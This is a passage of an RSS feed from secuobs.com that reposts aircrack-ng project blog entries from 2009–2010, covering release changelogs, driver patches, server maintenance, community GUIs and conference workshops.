aireplay-ng manpage for attack 0 (not disassociation packets, deauth packets) - manpages: Added the keys for interaction in airodump-ng - patches: Added regulatory domains override patches for atheros drivers (ath5k, ath9k and ar9170) - patches: Added 2.6.32 patch for r8187 driver (ieee80211) - Makefiles: Fixed make uninstall </description><link>http://www.secuobs.com/revue/news/215776.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/215776.shtml</guid></item>
<item><title>Monthly news (April 2010)</title><description>Secuobs.com : 2010-04-06 01:19:11 - Aircrack ng - Forum: - Patches to override the regulatory domain for ath5k, ath9k and ar9170. - The work on the C# GUI for aircrack-ng, WepCrackGUI, continues. And here is a blog post in italian about it. - Beini now has its own website. Here is the forum thread. - A few useful posts about using John The Ripper and other programs to generate wordlists (or use it with aircrack-ng): - Here and there. - Here is a script by Zermolo to generate wordlist with only numbers, called permutate, and another post in the same thread about the same subject with JTR. - Creating custom rules for John. - Word field is an incremental word list generator. Project news: - ebfe, who created airolib-ng, released an exploit for airodump-ng, aircrack-ng, airdecap-ng. You can find more information in his blog (Post 1, Post 2), but it just makes the tools crash, no real exploit released. It will be fixed in the next few days before the release (v1.1). - Nearly everything has been moved to the new server, only forum, trac and buildbot need to be moved. - Do you remember I wrote that trac didn't display svn commits for some unknown reason? That's now fixed, I just had to comment out a line in trac.ini. - For those who can't open the website due to URL filtering, use whydoyoublockme. It's not a mirror, it points to the exact same content as www.aircrack-ng.org. Other news: - I'll speak at Sharkfest. It will take place in the main campus at Stanford University, June 14-17. Here is the schedule. - Ever heard about NeoPwn? Version 2 will be based on the Nokia N900 and will be Backtrack Mobile. - Remember spoonwep and spoonwep 2? Shamanvirtuel is working on spoonwep 3. Public beta release is planned between 15th-30th April. - If you're using SliTaz, they released v3.0 a week ago. </description><link>http://www.secuobs.com/revue/news/209089.shtml</link><guid 
isPermaLink="false">http://www.secuobs.com/revue/news/209089.shtml</guid></item>
<item><title>Backcrack-ng v1.1</title><description>Secuobs.com : 2010-04-02 00:20:24 - Aircrack ng - The BackTrack team is happy to announce the acquisition of the Aircrack-NG project, as well as a new, long awaited update to v1.1. The acquisition will mark a turning point to the Aircrack-NG project in more than one sense, and we are looking forward to see the project grow. The new version of Aircrack-ng (to be renamed "backcrack-ng") is available in the SVN repositories for your testing. </description><link>http://www.secuobs.com/revue/news/208184.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/208184.shtml</guid></item>
<item><title>Monthly news (March 2010)</title><description>Secuobs.com : 2010-03-02 22:53:16 - Aircrack ng - Forum news: - Beini 10 final was released: Forum post. - I'm happily surprised that the C# (Mono) script development for aircrack-ng is still active. By the way, here is the project on sourceforge: wepcrackgui. The current version is 063. - A new version of minidwep-gtk, developed in shell script, gtk-server, zenity, kdialog, was released. Here is a video of this script in action. It is included in Beini 10. Trac news: - Various small fixes (makefile, manpage, ...). - A patch for the r8187 (ieee80211) driver on kernel 2.6.32 (and lower). Installation instructions are updated. - Compilation is fixed when compiling unstable stuff (wesside-ng, easside-ng and tkiptun-ng) with a recent gcc version (v4.4). General news: - Aircrack-ng is now 4 years old. I checked when the first news was posted and it was the 25th February 2006. Surprisingly, the 2 following news happened the 25th February this year: - A new paper about TKIP attacks was released by hirte: Enhanced TKIP Michael Attacks. - Airdrop-ng from TheX1le is now available in our subversion repository. Here is the video of the talk at Shmoocon 2010. If you haven't seen it yet, Shmoocon 2010 videos (and sometimes the slides too) are available. Last but not least, here is a very funny video of a woman calling Leo Laporte's Tech Guy Show claiming her WI-FI access has "disappeared". </description><link>http://www.secuobs.com/revue/news/197316.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/197316.shtml</guid></item>
<item><title>Monthly news</title><description>Secuobs.com : 2010-02-04 00:07:09 - Aircrack ng - A few things happened last month: - The google phone, Nexus One, was rooted and it has a bcm4329 chipset and it looks promising. - Airodump-ng (in svn trunk) now has interactive mode: you can control it with keys. You can find the documentation in the wiki. - A really small (only 10MB) distribution based on MicroCore Linux, console only. - I'm sure you saw it, Backtrack 4 was released a few weeks ago. - OSX Compiling (Ticket 687) should be fixed now (svn trunk revision 1657). - New version of Beini: 10 RC52. - The development of the GUI in C# (Mono) is quite active. Last but not least, aircrack-ng will be 4 years old by the end of February. </description><link>http://www.secuobs.com/revue/news/188347.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/188347.shtml</guid></item>
<item><title>Wiki and Trac search engine</title><description>Secuobs.com : 2010-01-20 20:25:38 - Aircrack ng - The wiki and trac implement OpenSearch and when the browser notices there's an OpenSearch on the website, it adds a small notification on which you can click to add the search engine. Firefox shows it with a light blue shadow on the icon of the search textbox like that. IE changes the color of the search engine selection to orange. Just click on it, and you can add wiki and trac search engines to your favorite browser. </description><link>http://www.secuobs.com/revue/news/183750.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/183750.shtml</guid></item>
<item><title>Trac, bugs, forum and t-shirts</title><description>Secuobs.com : 2010-01-09 22:14:04 - Aircrack ng - Actually, trac is not completely working. It's better than before, we can commit but now we can't see them in the timeline and also the source browser is not working anymore. I tried to debug a few days ago but I haven't found why it doesn't work. The path to the svn repository is correct, permissions of trac and on the filesystem are correct so I'm a bit out of ideas. About the commits, I updated to 1.0 and tagged it and also committed a few patches to fix bugs: - Client first seen and last seen in kismet netxml file. - Compilation on cygwin 1.7. - OSX patch (Ticket 653): Tap support for Darwin/OS X. - Other small things. The next bugs I'll take care of are: - Ticket 704: Fix broadcast and multicast detection in aircrack-ng; it still requires some work. - Ticket 498: Aircrack-ng does not support dictionaries over 2Gb. - I'd like to fix another compilation bug on OSX (Ticket 687) but I don't have access to any Mac so if anyone could give me an access to a mac with Darwin and another with Leopard, that's great. If anybody is getting rid of a Mac with Darwin/Leopard, we are really interested. I haven't chosen the other bugs yet, but I still have in mind that WPA handshake detection has to be fixed/enhanced and I remember a bug with airbase-ng not giving the Information Elements in the right order. There are a few interesting programs and scripts in the forum, and I'd like to give them more visibility (and even small scripts). What are your ideas/opinion about it? I haven't forgotten the t-shirts. They will be there soon. I might do a few with the new logo for Shmoocon. </description><link>http://www.secuobs.com/revue/news/179934.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/179934.shtml</guid></item>
<item><title>Happy new year, news, etc </title><description>Secuobs.com : 2010-01-03 23:40:56 - Aircrack ng - Hello everybody, First of all, we wish you a happy new year. There was no news here and no commit on trac for some time, but we never stopped working. Although svn commit wasn't working for us (see previous blog entry for more details), we used the tickets to store all patches that have to be committed. But I now have some good news: trac is working again. Don't ask me why, I have absolutely no idea, and I didn't change anything (except doing the usual updates). So that means I'll commit everything to sync svn with 10 final and then start committing all patches that were added to tickets since August (because they couldn't be committed) and others that were planned for 11. That will take a few days. I'll also try to update this blog at least once a month to tell you what happened during the last month in our forum, trac and on IRC. Here are a few things that happened recently: - Online WPA cracking services: with cloud computing, which was launched at the beginning of December, then now with GPU - Injection and packet capture with aircrack-ng seems to work with the Nokia N900. I also read that it will have USB host soon - Beini 10-RC51: a wireless network security testing system, it is based on Tiny Core Linux - GUI for aircrack-ng in C (using Mono) - minidwep-gtk: a GUI for aircrack-ng in shell script - Slitaz Aircrack-ng: the base Slitaz cooking version plus the latest Aircrack-ng SVN version, wireless drivers patched for injection and other related tools. I am also currently installing a new server (Core i5 266Ghz, 8Gb Ram, 2x 80Gb SSD) for aircrack-ng. That will allow us to better organize the different parts and give a better service to our ever growing community. Our webhoster offers ESXi and I first wanted to use it to virtualize our stuff, but it takes too much time to stabilize it (and IP management is a bit tricky/expensive), and since I didn't want to wait any longer, I switched to vmware server for the different parts: - trac and buildbot - forum - downloads (videos, patches, storage, archive, nightly builds; we currently have around 20Gb of stuff) - photos and videos of the conventions (btw, I'll soon post the pictures I took during 26C3 and of other conventions) - a few other virtual machines for testing. The main website and wiki will not be moved. Last but not least, I would also like to thank again everybody who helps us, not only the donations (although important to pay the servers and domains), but everybody who contributes to the project (in the forum, irc, in the wiki (documentation and translations), bug reports and bug fixes, improvements). More to come in the following days.</description><link>http://www.secuobs.com/revue/news/177699.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/177699.shtml</guid></item>
<item><title>Aircrack-ng 10</title><description>Secuobs.com : 2009-09-08 04:29:04 - Aircrack ng - Yes, 10 final, finally. There are not many changes compared to the 10rc4, just a few fixes. Here is the changelog: - airserv-ng: Now works fine between 32 and 64bit OSes - wesside-ng: Fixed some endianness bugs - airodump-ng-oui-update: Make sure the user is root when updating the file - airmon-ng: Updated iw download link (0917) - All: Fixed compilation with some gcc - patches: Added missing patches from patchesaircrack-ngorg  mac80211_2628-rc4-wl_frag ack_v3patch - manpage: Updated aireplay-ng manpage - INSTALLING: Removed (now) useless requirement for OSX installation - GUI (windows): Fixed 2nd selection of a capture file. For those who use subversion, the sources are not in sync with the trunk. The reason is that svn commit is currently broken. It broke during a Debian update and we're still trying to figure out how to fix it. (It should be fixed by the end of September in one way or another.) We've pinpointed the issue and found that the reason is because of the authentication, but since we did not change anything to the configuration, I have no idea why it suddenly broke. If anybody knows how to fix it, that would be great. Last but not least, we're also launching the new website (and logo) as explained in a previous post: New Stuff. Feedback is welcome.</description><link>http://www.secuobs.com/revue/news/138600.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/138600.shtml</guid></item>
<item><title>Contests   Brucon Wireless workshops</title><description>Secuobs.com : 2009-09-04 04:19:27 - Aircrack ng - Brucon is getting closer. As I said, I'll give a workshop Friday (17h00) and Saturday (09h00, I know, it's early) and there will be 2 contests (one each day). The winner will receive an ALFA AWUS036E with a 5dbi antenna. They will be run during the workshop and for both of them you need a laptop and a wireless card. You can use the tools of your choice. - The first one, Friday, you'll have to find an access point outside the convention area - And Saturday, you'll have to crack the key of an access point (I haven't decided yet if it will be WEP or WPA). More details will be given during the workshops.</description><link>http://www.secuobs.com/revue/news/137698.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/137698.shtml</guid></item>
<item><title>New stuff</title><description>Secuobs.com : 2009-08-07 20:15:22 - Aircrack ng - Hello everybody, sorry for not posting anything for some time now, but we have been really busy these days and we got new stuff for you: - 10 rc4 last week - 10 final release date - Planned features in 11 - New logo - New website. I guess you saw there was a release, 10rc4, a bit more than a week ago. This fixes a lot of stuff (and adds some new). It fixes compilation not only on linux but also on BSD platforms (OpenBSD compilation is fixed) and others. The changelog speaks for itself. Here are some planned features for 11: - Be able to use cowpatty tables directly in aircrack-ng (without having to convert them to airolib-ng) - OSX capture (and maybe injection) with some adapters (Ticket 623) - Improved WPA handshake detection - Bug fixes (of course). We also have been working on a new website. Here is a preview: http wwwaircrack-ngorg new_indexhtml. The goal of this new design is to be able to reduce the traffic on the website, currently around 1Tb each month, and also to give quick access to important information. As explained in an earlier post, it will not replace the wiki, it will just be the home page and be next to the wiki (you can keep all your bookmarks). If you (still) have any remarks (or improvements) about the new design, you can still post them in the forum (you don't need to register to post). The logo contest is over and we have a new logo. Here is a preview (winner: segini75). Last but not least, the new website (and new logo) will be launched at the same time as the 10 final release in a week or two if no big bugs are found in rc4.</description><link>http://www.secuobs.com/revue/news/128963.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/128963.shtml</guid></item>
</channel>
</rss>
 
